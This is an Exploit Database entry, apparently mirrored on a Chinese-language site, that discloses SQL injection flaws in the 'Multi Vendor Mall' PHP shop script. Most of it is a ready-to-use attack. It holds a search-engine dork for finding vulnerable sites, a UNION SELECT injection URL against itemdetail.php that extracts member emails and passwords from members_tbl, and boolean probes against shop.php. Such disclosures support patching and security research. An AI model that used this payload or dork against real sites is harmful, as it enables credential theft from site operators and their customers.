Multi Vendor Mall – ‘itemdetail.php?& shop.php’ SQL Injection

• Exploit Database
• 102 阅读

• 作者： CoBRa_21
  日期： 2010-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12755/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  -------------------------------------------------------------------------------------------   Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability   -------------------------------------------------------------------------------------------   Author: CoBRa_21   Script Home: http://www.multishopcms.com   Dork: pages.php?id= "Multi Vendor Mall"   -------------------------------------------------------------------------------------------   Sql Injection:   http://localhost/[path]/itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+members_tbl--     http://localhost/[path]/shop.php?storeid=77 and 1=2 http://localhost/[path]/shop.php?storeid=77 and 1=1 -------------------------------------------------------------------------------------------